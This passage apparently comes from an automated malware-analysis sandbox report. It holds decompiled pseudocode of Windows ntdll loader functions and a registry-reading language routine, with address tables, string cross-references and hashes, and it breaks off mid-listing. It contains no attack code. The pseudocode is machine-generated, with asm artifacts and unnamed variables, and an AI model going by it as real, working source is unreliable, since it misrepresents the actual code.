						if(( *0x10d5780 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x10d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x10d7984; // 0xa92bb8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x10d8464; // 0x74790110
					 *0x10db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x10d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                          0x01018e0f
                          0x01018e16
                          0x01018e19
                          0x01018e1b
                          0x01018e21
                          0x01018e7f
                          0x01018e85
                          0x01059354
                          0x0105936c
                          0x01059371
                          0x0105937b
                          0x01059381
                          0x01059381
                          0x0105937b
                          0x01018e9d
                          0x01018e9d
                          0x01018e29
                          0x01018e2c
                          0x01018e38
                          0x01018e3e
                          0x01018e43
                          0x01018eb5
                          0x01018eb9
                          0x010592aa
                          0x010592af
                          0x010592e8
                          0x010592e8
                          0x010592af
                          0x01018eb9
                          0x01018e45
                          0x01018e53
                          0x01018e5b
                          0x01018e5f
                          0x01018e78
                          0x01018e78
                          0x01018e7d
                          0x01018ec3
                          0x01018ecd
                          0x01018ed2
                          0x01018ed2
                          0x01018ec5
                          0x01018ec5
                          0x00000000
                          0x01018e7d
                          0x01018e67
                          0x01018ea4
                          0x0105931a
                          0x00000000
                          0x00000000
                          0x01059320
                          0x01018ea4
                          0x01018e70
                          0x01059325
                          0x01059340
                          0x01059345
                          0x01059345
                          0x01018e76
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Strings
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01059357
                          • minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
                          • LdrpFindDllActivationContext, xrefs: 01059331, 0105935D
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 0-3779518884
                          • Opcode ID: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                          • Instruction ID: bf6e8b670d3dce02e4afe05e7e438cb3b972545ec2925168cc7fe27021d82bd1
                          • Opcode Fuzzy Hash: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                          • Instruction Fuzzy Hash: 46411931A003119EDBB5AA1C8849B7A76F4BB01348F05C1ABEDC497599E7789E8083C1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E00FF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FF934A() != 0) {
								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x10d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x10d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01002280(_t92, 0x10d86cc);
															_t94 = E010B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x10d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01002280(_t108, 0x10d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FFFFB0(_t118, _t156, 0x10d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01029A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                          0x00ff8799
                          0x00ff879d
                          0x00ff87a1
                          0x00ff87a3
                          0x00ff87a8
                          0x00ff87c3
                          0x00ff87c3
                          0x00ff87c8
                          0x00ff87d1
                          0x00ff87d4
                          0x00ff87d8
                          0x00ff87e5
                          0x00ff87ec
                          0x01049bfe
                          0x01049c00
                          0x01049c02
                          0x01049c08
                          0x01049c0d
                          0x01049c0f
                          0x01049c14
                          0x01049c2d
                          0x01049c32
                          0x01049c37
                          0x01049c3a
                          0x01049c3c
                          0x01049c42
                          0x01049c42
                          0x01049c3c
                          0x01049c02
                          0x00ff87da
                          0x00ff87df
                          0x00ff87e3
                          0x00000000
                          0x00000000
                          0x00ff87e3
                          0x00ff87f2
                          0x00000000
                          0x00ff87fb
                          0x00ff87fd
                          0x00ff87fe
                          0x00ff880e
                          0x00ff880f
                          0x00ff8810
                          0x00ff8814
                          0x00ff881a
                          0x00ff881c
                          0x00ff881f
                          0x00ff8821
                          0x00ff8822
                          0x00ff8824
                          0x00ff8826
                          0x00ff882c
                          0x00ff882e
                          0x01049c48
                          0x01049c48
                          0x00ff8834
                          0x00ff8834
                          0x00ff8837
                          0x00000000
                          0x00000000
                          0x00ff8837
                          0x00ff882e
                          0x00ff883d
                          0x00ff8840
                          0x00ff8843
                          0x00ff8846
                          0x00ff8849
                          0x00ff884c
                          0x00ff884e
                          0x00ff8850
                          0x00ff8852
                          0x00ff8854
                          0x00ff8857
                          0x00ff88b4
                          0x00ff88b6
                          0x00ff88b6
                          0x00ff8859
                          0x00ff8859
                          0x00ff8859
                          0x00ff8861
                          0x00ff8866
                          0x00ff886a
                          0x00ff893d
                          0x00ff8941
                          0x00000000
                          0x00ff8947
                          0x00ff8947
                          0x00ff894a
                          0x00ff894c
                          0x00000000
                          0x00ff8952
                          0x00ff8955
                          0x00ff895a
                          0x00ff895d
                          0x00ff895d
                          0x00ff895f
                          0x00ff8961
                          0x00ff8961
                          0x00ff8968
                          0x00000000
                          0x00000000
                          0x00ff896a
                          0x00ff896b
                          0x00ff896e
                          0x00000000
                          0x00ff8970
                          0x00ff8970
                          0x00ff8970
                          0x00ff8970
                          0x00ff8972
                          0x00ff8972
                          0x00ff8974
                          0x00000000
                          0x00ff897a
                          0x00ff897a
                          0x00ff897d
                          0x00000000
                          0x00ff8983
                          0x01049c65
                          0x01049c6d
                          0x01049c72
                          0x01049c75
                          0x01049c75
                          0x01049c82
                          0x01049c86
                          0x01049c87
                          0x01049c88
                          0x01049c89
                          0x01049c8c
                          0x01049c90
                          0x01049c95
                          0x01049c97
                          0x01049ca0
                          0x01049ca3
                          0x01049ca9
                          0x01049ca9
                          0x00000000
                          0x01049ca9
                          0x01049ca3
                          0x00000000
                          0x01049c97
                          0x00ff897d
                          0x00000000
                          0x00ff8974
                          0x00ff8988
                          0x00ff8992
                          0x00ff8996
                          0x00000000
                          0x00ff8996
                          0x00ff894c
                          0x00000000
                          0x00ff8870
                          0x00ff887b
                          0x00ff887d
                          0x00ff887f
                          0x00ff8881
                          0x00ff8884
                          0x00ff8884
                          0x00ff8886
                          0x00ff8889
                          0x00ff888c
                          0x00ff888e
                          0x00ff8891
                          0x00ff8891
                          0x00ff8898
                          0x00000000
                          0x00000000
                          0x00ff889a
                          0x00ff889b
                          0x00ff889e
                          0x00000000
                          0x00000000
                          0x00ff88a0
                          0x00ff88a8
                          0x00ff88b0
                          0x00ff88b2
                          0x00ff88d3
                          0x00ff88d5
                          0x00000000
                          0x00ff88d7
                          0x00ff88db
                          0x00ff88dc
                          0x00ff88e0
                          0x00ff88e8
                          0x00ff88ee
                          0x00ff88f0
                          0x00ff88f3
                          0x00ff88fc
                          0x00ff8901
                          0x00ff8906
                          0x00ff890c
                          0x00ff890c
                          0x00ff890f
                          0x00ff8916
                          0x00ff8917
                          0x00ff8918
                          0x00ff8919
                          0x00ff891a
                          0x00ff891f
                          0x00ff8921
                          0x01049c52
                          0x01049c55
                          0x01049c5b
                          0x01049cac
                          0x01049cc0
                          0x01049cc0
                          0x01049c55
                          0x00ff8927
                          0x00ff8927
                          0x00ff892f
                          0x00ff8933
                          0x00000000
                          0x00ff88f5
                          0x00ff88f5
                          0x00000000
                          0x00ff88f7
                          0x00ff88f7
                          0x00ff88fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00ff88fa
                          0x00ff88f5
                          0x00ff88f3
                          0x00000000
                          0x00ff88d5
                          0x00000000
                          0x00ff88b2
                          0x00ff88c9
                          0x00000000
                          0x00ff88c9
                          0x00ff887f
                          0x00ff886a
                          0x00ff8857
                          0x00ff8852
                          0x00ff88bf
                          0x00ff88bf
                          0x00ff87aa
                          0x00ff87ad
                          0x00ff87ae
                          0x00ff87b4
                          0x00ff87b5
                          0x00ff87b6
                          0x00ff87b8
                          0x00ff87bd
                          0x00ff87c1
                          0x00ff87f4
                          0x00ff87fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00ff87c1
                          0x00000000

                          Strings
                          • LdrpDoPostSnapWork, xrefs: 01049C1E
                          • minkernel\ntdll\ldrsnap.c, xrefs: 01049C28
                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                          • API String ID: 2994545307-1948996284
                          • Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                          • Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
                          • Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                          • Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x10d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x10d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01007D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01007D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FEB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                          0x00ff7e4c
                          0x00ff7e50
                          0x00ff7e55
                          0x00ff7e58
                          0x00ff7e5d
                          0x00ff7e71
                          0x00ff7f33
                          0x00ff7e77
                          0x00ff7e77
                          0x00ff7e79
                          0x00ff7e79
                          0x00ff7e7e
                          0x00ff7f45
                          0x01049848
                          0x00000000
                          0x01049848
                          0x00ff7f4e
                          0x00ff7f53
                          0x00ff7f5a
                          0x00000000
                          0x00000000
                          0x0104985a
                          0x01049862
                          0x01049866
                          0x00000000
                          0x0104986c
                          0x00000000
                          0x0104986c
                          0x00ff7e84
                          0x00ff7e84
                          0x00ff7e8d
                          0x01049871
                          0x00ff7eb8
                          0x00ff7ec0
                          0x00ff7ec0
                          0x00ff7e9a
                          0x0104987e
                          0x00000000
                          0x00000000
                          0x01049884
                          0x0104988b
                          0x010498a7
                          0x010498ac
                          0x010498b1
                          0x010498b6
                          0x010498b8
                          0x010498b8
                          0x010498b9
                          0x00000000
                          0x010498b9
                          0x00ff7ea0
                          0x00ff7ea7
                          0x00000000
                          0x00000000
                          0x00ff7eac
                          0x00ff7eb1
                          0x00ff7ec6
                          0x00ff7ed0
                          0x010498cc
                          0x00ff7ed6
                          0x00ff7ed6
                          0x00ff7ed6
                          0x00ff7ede
                          0x00ff7ee3
                          0x010498e3
                          0x010498f0
                          0x01049902
                          0x010498f2
                          0x010498fb
                          0x010498fb
                          0x01049907
                          0x0104991d
                          0x0104991d
                          0x01049907
                          0x010498e3
                          0x00ff7ef0
                          0x00ff7f14
                          0x00ff7f14
                          0x00ff7f1e
                          0x01049946
                          0x00ff7f24
                          0x00ff7f24
                          0x00ff7f24
                          0x00ff7f2c
                          0x0104996a
                          0x01049975
                          0x01049975
                          0x0104997e
                          0x01049993
                          0x01049993
                          0x0104997e
                          0x00000000
                          0x00ff7ef2
                          0x00ff7efc
                          0x00ff7f0a
                          0x00ff7f0e
                          0x01049933
                          0x00000000
                          0x01049933
                          0x00000000
                          0x00ff7f0e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00ff7eb1

                          Strings
                          • minkernel\ntdll\ldrmap.c, xrefs: 010498A2
                          • LdrpCompleteMapModule, xrefs: 01049898
                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                          • API String ID: 0-1676968949
                          • Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                          • Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
                          • Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                          • Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FEE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E00FEE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FEF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010295D0();
						}
						if(_t78 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0102FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01029600();
					if(_t97 < 0) {
						goto L6;
					}
					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0102BB40(_t83, _t102 + 0x24, _t78);
								if(L00FF43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0102BB40(_t84, _t102 + 0x24, _t94);
									if(L00FF43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                          0x00fee620
                          0x00fee628
                          0x00fee62f
                          0x00fee631
                          0x00fee635
                          0x00fee637
                          0x00fee63e
                          0x01045503
                          0x01045503
                          0x00fee64c
                          0x00fee64c
                          0x00fee651
                          0x00000000
                          0x00000000
                          0x00fee661
                          0x00fee665
                          0x0104542a
                          0x00fee715
                          0x00fee71a
                          0x00fee71c
                          0x00fee720
                          0x00fee720
                          0x00fee727
                          0x00fee736
                          0x00fee736
                          0x00fee743
                          0x00fee743
                          0x00fee673
                          0x00fee678
                          0x00fee67d
                          0x00fee682
                          0x00fee685
                          0x00fee692
                          0x00fee69b
                          0x00fee6a3
                          0x00fee6ad
                          0x00fee6b1
                          0x00fee6b2
                          0x00fee6bb
                          0x00fee6bf
                          0x00fee6c0
                          0x00fee6c8
                          0x00fee6cc
                          0x00fee6d5
                          0x00fee6d9
                          0x00000000
                          0x00000000
                          0x00fee6e5
